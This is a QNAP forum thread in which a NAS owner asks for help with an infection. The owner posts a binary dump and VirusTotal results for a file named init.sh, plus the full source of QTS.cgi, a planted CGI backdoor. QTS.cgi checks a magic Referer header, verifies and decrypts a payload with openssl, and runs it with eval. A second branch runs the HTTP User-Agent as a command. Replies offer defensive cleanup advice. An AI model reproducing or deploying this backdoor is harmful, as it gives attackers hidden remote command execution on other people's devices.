Virus on my QNAP?
- dolbyman
- Guru
- Posts: 35273
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Virus on my QNAP?
post in codewraps or attach to forum, hard to judge without info
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
@Dolbyman:
I don't know how to attach the file to this post, therefor the information I can provide:
- I refer to the following file:
- I own a TS-459 Pro with the latest firmware (updated today).
- As I can not attach the actual file, I hereby include a part (first part) of the file:
I don't know how to attach the file to this post, therefor the information I can provide:
- I refer to the following file:
Code: Select all
[/etc/config] # ls -le init.sh
-rwxr-xr-x 1 admin administ 2736 Wed Nov 26 16:32:47 2014 init.sh*
- As I can not attach the actual file, I hereby include a part (first part) of the file:
Code: Select all
ELFT744 (77?
?
Y?????PQ?i??̀UWVS?D$?\$?L$?T$ ?t$$?|$(?l$,̀[^_]?U??SVW1?jQf??h?????uP?x?M
?]??????}?9?U??} ?̀??u??1??Љ?1?@̀??_^[]ÐU??WV??S1?1??s
?<???
??<??????<?C??(u?[^_]?U??WVS???U?1҈B??u??CщU?1??E??E??]?É]܊??]?]??4B??u??9?C}܉u?Ɗ?E???]?}?9}??r?ƀƀ??[^_]?Uщ?WVS???????M?]??E?M?A?????ljM????ށ???]?0?M?
??M?M?
?M?M??Ɋ
0
B??;U?u??]?????????[^_]?U??W??V??S?ˁ???ڍ????????????????????????B????????????3??????????????????????????????????ڍ???????@;|???1???[^_]?U??WVS?Ӂ?jjPj?{?????? ??????jjPj?]??????@???)ĉ?t???PPjjR??t???Wh???l????,?????l????? 9Љ?tPPWj???????
?,PPWj???????1??@??t?t??????
78t????E?QPh?
7h????????????????&?]???M???p???9?9?????w
??O????????)̉?jjh?
7j?b?????XZjj?u?SWh??K????? ????;M?u;E?tQQWj?/???????PPWj????XZh?
7j
?
????E?%?PhAh?
7j??????? ?u?SP??j???????????;]?u;E?tSSWj?????????,?u??u?Wj_????ZYWj??????p?????????p????PPh?
7j
?t????E?%?PhAh?
7j?Z????? V??t???P??j?F????u??u?Sj_?8?????Sj?-????Eȃ?
??x???Dž|????E???x????EЉE?Sh?
7h???????
Sh?
7h???????1???e??[^_]?U??WVS????d?????t?????`?????????@9?u?1??
??????@=?u???Džl?????T???????????t?????h???Džp?????l?????`?????p?????t???h????ى?????????????h????? 7????????u????h?????h????ىډ??x?????uŹ? 7?????f?????u?؉???ѥp????w?????l?????l???(?Z???1????d????@=?u?0??Ĕ[^_]ÍL$????q?U??WVSQ???0?Y??D???@?????8ut??@?????<?????xu?C???????u?j?jj?<???^_?sj
?0???XZjh??"???ZYjj??<(u??D?????)???2<=?
?1??a??v
?????5?t?????
ʈ?5????F?? ?1?1?1ɋ?D????@??u?????5?????F??????=??????????ʍ???????????????????????????H??????????e???????X??
??h???H???????????????????,??8?#??D??????????Pjj?j"jW????????4???h???????? ;?????????????f1???8?????????jWjj??????Hu6F??v'????????0????O?1??@?t0??0????8t?G??u?P??4?????????j[?_??????o??????1??C??8???V?Pjj?=???????%????????
??8?????????j?????????t??
(Enter:next line Space:next page Q:quit R:show the rest)
[/etc/config] # more init.sh
ELFT744 (77?
?
Y?????PQ?i??̀UWVS?D$?\$?L$?T$ ?t$$?|$(?l$,̀[^_]?U??SVW1?jQf??h?????uP?x?M
?]??????}?9?U??} ?̀??u??1??Љ?1?@̀??_^[]ÐU??WV??S1?1??s
?<???
??<??????<?C??(u?[^_]?U??WVS???U?1҈B??u??CщU?1??E??E??]?É]܊??]?]??4B??u??9?C}܉u?Ɗ?E???]?}?9}??r?ƀƀ??[^_]?Uщ?WVS???????M?]??E?M?A?????ljM????ށ???]?0?M?
??M?M?
?M?M??Ɋ
0
B??;U?u??]?????????[^_]?U??W??V??S?ˁ???ڍ????????????????????????B????????????3??????????????????????????????????ڍ???????@;|???1???[^_]?U??WVS?Ӂ?jjPj?{?????? ??????jjPj?]??????@???)ĉ?t???PPjjR??t???Wh???l????,?????l????? 9Љ?tPPWj???????
?,PPWj???????1??@??t?t??????
78t????E?QPh?
7h????????????????&?]???M???p???9?9?????w
??O????????)̉?jjh?
7j?b?????XZjj?u?SWh??K????? ????;M?u;E?tQQWj?/???????PPWj????XZh?
7j
?
????E?%?PhAh?
7j??????? ?u?SP??j???????????;]?u;E?tSSWj?????????,?u??u?Wj_????ZYWj??????p?????????p????PPh?
7j
?t????E?%?PhAh?
7j?Z????? V??t???P??j?F????u??u?Sj_?8?????Sj?-????Eȃ?
??x???Dž|????E???x????EЉE?Sh?
7h???????
Sh?
7h???????1???e??[^_]?U??WVS????d?????t?????`?????????@9?u?1??
??????@=?u???Džl?????T???????????t?????h???Džp?????l?????`?????p?????t???h????ى?????????????h????? 7????????u????h?????h????ىډ??x?????uŹ? 7?????f?????u?؉???ѥp????w?????l?????l???(?Z???1????d????@=?u?0??Ĕ[^_]ÍL$????q?U??WVSQ???0?Y??D???@?????8ut??@?????<?????xu?C???????u?j?jj?<???^_?sj
?0???XZjh??"???ZYjj??<(u??D?????)???2<=?
?1??a??v
?????5?t?????
ʈ?5????F?? ?1?1?1ɋ?D????@??u?????5?????F??????=??????????ʍ???????????????????????????H??????????e???????X??
??h???H???????????????????,??8?#??D??????????Pjj?j"jW????????4???h???????? ;?????????????f1???8?????????jWjj??????Hu6F??v'????????0????O?1??@?t0??0????8t?G??u?P??4?????????j[?_??????o??????1??C??8???V?Pjj?=???????%????????
??8?????????j?????????t??
--More-- (88% of 2736 bytes)
- OneCD
- Guru
- Posts: 12146
- Joined: Sun Aug 21, 2016 10:48 am
- Location: "... there, behind that sofa!"
Re: Virus on my QNAP?
Well, it starts with ELF so it's a binary executable. Wouldn't recommend running it though.
Try showing the text strings:
Try showing the text strings:
Code: Select all
strings /etc/config/init.sh
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
Output from the proposed command:
Code: Select all
[/etc/config] # strings /etc/config/init.sh
UWVS
[^_]
SVW1
_^[]
[^_]
[^_]
[^_]
[^_]
PPWj
PPWj
QQWj
PPWj
SSWj
ZYWj
[^_]
[^_]
WVSQ
Hu6F
Y[^_]
jC@}x
}PzdH
/usr/bin/sh
/bin/ash
- OneCD
- Guru
- Posts: 12146
- Joined: Sun Aug 21, 2016 10:48 am
- Location: "... there, behind that sofa!"
-
- Experience counts
- Posts: 2415
- Joined: Wed Jan 08, 2014 10:34 pm
Re: Virus on my QNAP?
That's certainly going to be mailcious. Quite likely the malware foothold.My only worry (for now) is the init.sh file in /etc/config. If someone knows if this can be deleted as it contains no normal script commands....
Drop a copy on to virustotal.com and see if it's recognised malware.
TS-431+ for storage and media and a bunch of IP cams under Surveillance Station. TVS-473 as files backup and QVR Pro.
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
Hi @Alastair-Stevenson,
I dropped the file at virustotal.com.
Herewith the results:
Details:
I have restarted the NAS today and determined the last time this file has been accessed (using ls -lu). After the reboot the file wasn't accessed. So it might be that the malware -in the directory of autorun.sh (so not on the disks but on the NAS itself)- is the trigger to start this 'malware?'-executable. I will frequently look at the file if it has been accessed and check all other changes which indicate the malware might still be there.
I dropped the file at virustotal.com.
Herewith the results:
Code: Select all
0 / 57
No engines detected this file
SHA-256 f12393982971024695b32caecdf16f4c96fe68a765949727f6a1b84e2eecbb6d
File name init.sh
File size 2.67 KB
Last analysis 2015-06-04 10:31:24 UTC
Code: Select all
Basic Properties
MD5 59b6fdd280fe35f41f77065d3d8a69bf
SHA-1 774b1fd8d6050fa2f7661060bac1a88acc3a6fce
File Type ELF
Magic ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
SSDeep 48:fQdCFNsQhYEqlhGgP66RaCHhOA5Nmh6rYIBCYwZX6MODXOB:fEC3sQRqlhGcRzpnOOpBC9X6PD+B
TRiD ELF Executable and Linkable format (generic) (100%)
File Size 2.67 KB
Tags
elf
History
First Submission 2015-06-04 10:31:24
Last Submission 2015-06-04 10:31:24
Last Analysis 2015-06-04 10:31:24
File Names
init.sh
ELF Info
Header
Class ELF32
Data 2's complement, little endian
Header Version 1 (current)
OS ABI UNIX - System V
ABI Version 0
Object File Type EXEC (Executable file)
Required Architecture Intel 80386
Object File Version 0x1
Program Headers 1
Section Headers 0
Contained Segments
LOAD
ExifTool File Metadata
CPUArchitecture 32 bit
CPUByteOrder Little endian
CPUType i386
FileType ELF executable
MIMEType application/octet-stream
ObjectFileType Executable file
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
Malware is still there.
After a reboot it creates at least a file in /home/httpd/cgi-bin/qid named QTS.cgi
I have added the content of this file below (malware remover deletes this file but not the creator..)
Anyone knows what it does (my knowledge of linux script is too limited)???
After a reboot it creates at least a file in /home/httpd/cgi-bin/qid named QTS.cgi
I have added the content of this file below (malware remover deletes this file but not the creator..)
Anyone knows what it does (my knowledge of linux script is too limited)???
Code: Select all
[/home/httpd/cgi-bin/qid] # more QTS.cgi
#!/bin/sh
genrstr ()
{
local s=;
local min=${1:-4};
local max=${2:-12};
local kspace="${3:-a-zA-Z}"
tr -dc "$kspace" < /dev/urandom | {
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
echo "$s"
}
}
command -v mktemp > /dev/null 2>&1 || mktemp () {
local suffix=`genrstr 6 6`
test "$2" && { mkdir "${2%XXXXXX}$suffix"; echo "${2%XXXXXX}$suffix"; } || { touch "${1%XXXXXX}$suffix"; echo "${1%%XXXXXX}$suffix"; }
}
exec 2>/dev/null
PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
test ! -z "${QUERY_STRING}" || { printf "Date: "; TZ=UTC date; exit 0; }
echo "Date: Fri Nov 18 22:06:14 GMT 2016"
cr=`printf '\r' || echo -ne '\r'`
test "${#cr}" -eq 1 && echo "$cr" || echo ""
test "x$HTTP_REFERER" = "x41f8047417288c333cd56c0b26a3db0d00f0c90e" || exit 0
test ! -z "${0}" && test `ps aux | grep "${0}" | wc -l` -gt 40 && exit 0
command -v openssl >/dev/null 2>&1 && {
POSTDATA=''
k="1PfFPWcCBz6LlhdAgRf4oZPNe3IvNQ6U"
test "x${REQUEST_METHOD}" = xPOST && test ! -z "${QUERY_STRING}" && case "${QUERY_STRING}" in '' | *[!0-9]* | 0* ) false ;; [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9] ) d="$(( `date +%s` / 100 ))"; test "${QUERY_STRING}" = "${d}" && ct="$d" || { test "${QUERY_STRING}" = "$(( $d - 1))" && ct="$(( $d - 1 ))"; } ;; *) false ;; esac && test ! -z "${QUERY_STRING}" && {
nl='
'
case "${CONTENT_LENGTH}" in '' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` || exit 0
s="${POSTDATA##*.}"
st="${s##*-}"
s="${s%%-*}"
d="$(( $d / 1000 ))"
test ! -z "$d" && test ! -z "$st" && test "${#st}" = 5 && { test "x$st" = "x$d" || test "x$st" = "x$(( $d - 1 ))"; } || { test -f "$t" && rm "$t"; exit 0; }
case "$s" in '' | *[!a-zA-Z0-9/+=$nl]* ) test -f "$t" && rm "$t"; exit 0; ;; esac
t=`mktemp /tmp/.tmp.XXXXXX` || exit 0
cat > "$t" <<"EOF" || { test -f "$t" && rm "$t"; exit 0; }
-----BEGIN PUBLIC KEY-----
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAyiG+H/1fcLMfTNUvvBes
OJq06fOGmBFKIUOCPsyGpAuzDrCKlnBuHoL4hSEtnuxTBNt8jABzdZ+p9qUbAZ3O
zaPmJIds1gHHl1KF+Q8H5bNdNs9MCRkEvCUgJGFe3AalL7k+j/RXBsWrsLCKdGKW
aH+dtC0NdLKdkzhK8qBqzHxC+MUGzee5//OgDKdcKeelaCgzUJa0ui11BZ3IjKpQ
l7HokVHmyzRrJGPcuc4klH9bK4SeADehRyjylivHQcqSK1sNswapJm2qDjyQ7hjR
R2saOzubTUw1+2QKl+My5Sfyo/B8NopNY6EAOL8YCPVHCapq2af2ZythaV22VpfY
ztzjEy5OkFNh6fRgZNpbsuMu4nPaB/rgvJmsWx93ansh4IeXiPyOuKVBamUZyIvL
xr2ESC2rhgWhqgJuiLlHG+HMK63PodBMFyKq9rLd4h99nXb9+iCmFQ9fzJKs9SSM
j7xadGpabK2aNTpN3zDAuEGI4ZOtqxLqWjEHm0bE+Z5FAgMBAAE=
-----END PUBLIC KEY-----
EOF
test ! -z "$s" && h=`openssl base64 -d <<EOF | openssl rsautl -pubin -inkey "$t" -verify
$s
EOF
` || { test -f "$t" && rm "$t"; exit 0; }
test -f "$t" && rm "$t"
m="${POSTDATA%%.*}"
POSTDATA=''
case "$m" in '' | *[!a-zA-Z0-9/+=$nl]* ) exit 0 ;; esac
k=`openssl dgst -sha1 -binary -hmac "$ct" <<EOF | openssl base64
$k
EOF
`
m=`openssl enc -d -aes-256-cbc -k "$k" -md sha1 -salt -a <<EOF
$m
EOF
`
mh=`openssl dgst -sha1 -binary -hmac "$st" <<EOF | openssl base64
$m
EOF
`
test ! -z "$h" && test "$h" = "$mh" || exit 0
eval "$m"
true
} || {
t=`mktemp /tmp/.tmp.XXXXXX` || exit 0
cat > "$t" <<"EOF" || { test -f "$t" && rm "$t"; exit 0; }
-----BEGIN PUBLIC KEY-----
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEA9QmHMw4jw8COLYKgOqfC
0GZsRSwFgixT0liMc42ZSrssrsFGZlDPK35zldmbUsEQXtFYkDjVeUckp2ah8Fcf
ABFUG8MLnl6wTvxGZwJJbMLPDiYo5l/d07BKcbwYuqNp+2//2dukxCyakOIInIqF
LgrM5nvp5BKBBccMlMBasFtxZfFgtNjlQ9i9mNfi53nalrMPRol9KifW1YxmLw1+
7GTujFSlyK9Apvi/ZI2y/vym6NWbWEsaE5B9ggXJYrVxlbKxMIzWuXf18S2p48Fh
pVUyYJ0mjDUc3SiJR4RiPikPpTQgkSjy90aMKroWCAd9M6cZtfwCzhMbvytNmdtd
YxBNNn0FmQ51cLPc+dpaIIx2i/2cGdHY8ZAjBDMBMBkjIe2gFgc6lJ0WOlT638z+
w7/mP+hcCoLVUiGSiEumz3UL5PmoVa3w2t04Ra70PLWApGsI/gpHyH0W8i6yVBHE
qUsaQxnBOFvy+iSomyFil2dxKQLjTwyZBn8+1KmonJ2pAgMBAAE=
-----END PUBLIC KEY-----
EOF
openssl rsautl -pubin -inkey "$t" -encrypt <<EOF | openssl base64
$k
EOF
rm "$t"
true
}; true; } || {
test "x$ACCEPT_LANGUAGE" = "x11238f2b4a7c2089afd1301374a658cfa8562ec6" && eval "$HTTP_USER_AGENT"
}
test -f "$t" && rm "$t"
sleep 1
exit 0
- dolbyman
- Guru
- Posts: 35273
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Virus on my QNAP?
contact qnap for assistance
- Trexx
- Ask me anything
- Posts: 5388
- Joined: Sat Oct 01, 2011 7:50 am
- Location: Minnesota
Re: Virus on my QNAP?
I would say nothing good by the little bit of it I understand. I would make sure you router is set to block all QNAP incoming ports, make sure uPNP & probably for time being myqnapcloud is disabled etc.
If you are running the latest QTS version, look Control Panel / Hardware / and uncheck run user defined processes. You should also click the View Autorun.sh link to see if anything is listed there.
If you are running the latest QTS version, look Control Panel / Hardware / and uncheck run user defined processes. You should also click the View Autorun.sh link to see if anything is listed there.
Paul
Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350
Model:TVS-673 32GB & TS-228a Offline[/color]
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350
Model:TVS-673 32GB & TS-228a Offline[/color]
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
- dolbyman
- Guru
- Posts: 35273
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Virus on my QNAP?
viewtopic.php?f=50&t=136085#p641687Trexx wrote:You should also click the View Autorun.sh link to see if anything is listed there.
autorun.sh is apparently infected, with encrypted commands (?!?!)
- Trexx
- Ask me anything
- Posts: 5388
- Joined: Sat Oct 01, 2011 7:50 am
- Location: Minnesota
Re: Virus on my QNAP?
Why I recommended UNCHECKING run itdolbyman wrote:viewtopic.php?f=50&t=136085#p641687Trexx wrote:You should also click the View Autorun.sh link to see if anything is listed there.
autorun.sh is apparently infected, with encrypted commands (?!?!)
Paul
Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350
Model:TVS-673 32GB & TS-228a Offline[/color]
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350
Model:TVS-673 32GB & TS-228a Offline[/color]
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
Thanks @Trexx and @dolbyman,
There is no option to run user defined processes (probably because the highest version for 459Pro is 4.2.6 and not a 4.3.* version).
I have blocked all ports in my router and disabled the NAS from configuring my router.
I will contact QNAP for assistance.
Just to review my findings and actions taken (not in actual sequence):
- Removed all infected *.cgi files from /home/httpd/cgi-bin (and it's subdirectories)
- Removed the malware entry in crontab
- Removed hidden .RMM... directory (I believe it was /share/MD0_DATA/.qpkg)
- Removed all additions in script files of installed packages (as added after first line in the file .. )
- Removed autorun.sh and an malware executable from the startup directory (sdx6 device I believe)
- Restarted the NAS several times
- Installed latests firmware
- Changed all passwords for users
- Removed all non essential packages
- Installed latests Malware remover
- Keeping an eye on init.sh (still don't know if it can be deleted)
- Changed the names of the following files (as I don't trust them)
- Just noticed a user [sshd] (yes including square brackets is added to the passwd file... don't know if this is normal .. I don't know if this is also part of the malware .. potentially enabling access via sshd/ssh to QNAP systems??
Will keep you informed if I make any progress. If anyone has any brilliant thoughts, please share them.
There is no option to run user defined processes (probably because the highest version for 459Pro is 4.2.6 and not a 4.3.* version).
I have blocked all ports in my router and disabled the NAS from configuring my router.
I will contact QNAP for assistance.
Just to review my findings and actions taken (not in actual sequence):
- Removed all infected *.cgi files from /home/httpd/cgi-bin (and it's subdirectories)
- Removed the malware entry in crontab
- Removed hidden .RMM... directory (I believe it was /share/MD0_DATA/.qpkg)
- Removed all additions in script files of installed packages (as added after first line in the file .. )
- Removed autorun.sh and an malware executable from the startup directory (sdx6 device I believe)
- Restarted the NAS several times
- Installed latests firmware
- Changed all passwords for users
- Removed all non essential packages
- Installed latests Malware remover
- Keeping an eye on init.sh (still don't know if it can be deleted)
- Changed the names of the following files (as I don't trust them)
Code: Select all
-rw-r--r-- 1 admin administ 193 Sep 13 03:52 FVsSlowcXu
-rw-r--r-- 1 admin administ 393 Sep 13 03:52 NihLqRdqovnhIHi
-rw-r--r-- 1 admin administ 1679 Sep 13 03:52 gilgagrq
Will keep you informed if I make any progress. If anyone has any brilliant thoughts, please share them.
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
Ticket to QNAP submitted.
-
- Starting out
- Posts: 23
- Joined: Wed Oct 15, 2014 12:00 am
Re: Virus on my QNAP?
Anyone else getting these messages?
Running AVG on my laptop I am prevented from accessing my QNAP TS412 and am getting following messages:
"aborted connection on qnapcloud.... because it was infected with Win32:Malware-gen"
ditto but with "JS:Redirector-BWW"
I've checked that the NAS is up to date with virus database and has recently scanned with no reported issues. Is this for real and if so, why is the NAS antivirus not picking it up? Should I/can I run Spybot S&D on the NAS?
Advice appreciated!
Running AVG on my laptop I am prevented from accessing my QNAP TS412 and am getting following messages:
"aborted connection on qnapcloud.... because it was infected with Win32:Malware-gen"
ditto but with "JS:Redirector-BWW"
I've checked that the NAS is up to date with virus database and has recently scanned with no reported issues. Is this for real and if so, why is the NAS antivirus not picking it up? Should I/can I run Spybot S&D on the NAS?
Advice appreciated!
QNAP TS412